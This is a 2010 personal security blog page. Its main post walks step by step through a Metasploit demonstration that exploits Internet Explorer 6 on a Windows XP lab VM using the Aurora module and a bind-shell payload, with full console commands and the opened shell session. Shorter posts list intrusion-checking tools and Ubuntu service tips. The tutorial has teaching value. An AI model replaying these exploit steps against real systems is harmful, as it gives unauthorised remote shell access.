Search This Blog

Wednesday, March 31, 2010

[n|u Delhi Presentations] 27th March 2010...

There was a scheduled null-meet on 27th March 2010 in IIT delhi, where I, actually, was supposed to JUST attend the meet. In fact, I was little excited to attend the presentation by Vishwas, who was going to deliver some live demonstration(actually, thats what I thought before coming to the meet[:(], but that doesn't matter) on IE8 being exploited on Windows 7 machine with ASLR and DEP enabled. [:-o]

Yes, you heard it right!
This was done by Peter Vreugdenhil in pwn2own 2010 CanSecWest contest.

You may find the detailed report here.

Well, I just thought of showing something live demonstration, so to clear some very basic terms like, a Vulnerability and an Exploit.
This can be good start for those who are new to these terms.

A vulnerability is loophole in a service.
An exploit is the penetration/doing something unusual(which is not supposed to be done by that service), by using the vulnerability.
As simple, as it sounds :)

In general scenario, an exploit is divided in two parts. The vulnerability exposure and the payload.

The payload set of machine language instructions in form of opcodes, so as to interact with the processor, and execute the part of code of attacker's choice.

The live demonstration, was about exploit IE 6 on windows XP SP2 box, with Aurora exploit(which, Google claims to be used by Chinese hackers, for the recent attacks on their servers in China). I used Metasploit framework to develop the exploit in a quicker way, and set the parameters accordingly.

So, following are the all things, what I did while demonstrating it:

1. Started the Metasploit using 'msfconsole' on my Ubuntu host
user@localhost:~$ msfconsole
                                 _       _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|

=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 537 exploits - 256 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
=[ svn r8964 updated today (2010.03.31)

msf >


2. Searched for the 'aurora' string (as I was knowing, the such kind of keyword exists)
msf > search -t exploit aurora
[*] Searching loaded modules for pattern 'aurora'...

Exploits
========

Name Rank Description
---- ---- -----------
windows/browser/ms10_002_aurora normal Internet Explorer "Aurora" Memory Corruption

msf >

3. Selected the module
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) >


4. Show parameters to be set
msf exploit(ms10_002_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(ms10_002_aurora) >


5. Set server as my Ubuntu host, so I gave the IP of my 'vmnet8' adapter, as the guest XP was on NAT
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.188.1
SRVHOST => 192.168.188.1


6. Set URIPATH to "/" for the convenience
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /


7. And here comes the second part of the Exploit i.e. Payload. I set the payload as windows/shell/bind_tcp, which is supposed to listen for a connection, Spawn a piped command shell
msf exploit(ms10_002_aurora) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp


8. At last, before you are going to exploit the target machine, re-check the parameters
msf exploit(ms10_002_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.188.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)


Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(ms10_002_aurora) >


9. Run the exploit
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.


10. Now put the URL in victim's machine


11. In console window, you can see one session is opened
msf exploit(ms10_002_aurora) >
[*] Using URL: http://192.168.188.1:8080/
[*] Server started.
[*] Started bind handler
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.188.138
[*] Started bind handler
[*] Command shell session 1 opened (192.168.188.1:54460 -> 192.168.188.138:4444)


12. Interacting with session, by specifying session number will give u...
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>



..............Done!!!

Phheewww......

OMG, I wrote that all? ;;)

Tuesday, March 23, 2010

the blog title...

I have always been keen and telling others about
"Keeping your own system Secure, before you go behind others."
So, I just wanted to name few tools, which may help you investigate, in case, you feel like, been-infiltrated (you know, what I mean :P)

Windows:
-TCPView
-Process Explorer
-Process Monitor

Though, there is a common command line tool in windows as well as in Linux netstat.
Also, a network sniffer like Wireshark can do a lot to aid.

Remove service from startup (Ubuntu)...

Remove unwanted application after a system boot...
also, all of services used to be residing in /etc/init.d/ folder
run command as follows...

sudo update-rc.d <service-name> remove

Changing default runlevel in Ubuntu...

-Edit /etc/init/rc-sysinit.conf using any of your favourite editor(mine is nano ;))
-Find env DEFAULT_RUNLEVEL which should be set as 2, by default.
-Change it to your desirable runlevel.
-Give a reboot and you are done!

Here is a quick reference
Debian Linux runlevels
ID Description
0 Halt
1 Single-User mode
2-5 Full Multi-User with console logins and display manager if installed
6 Reboot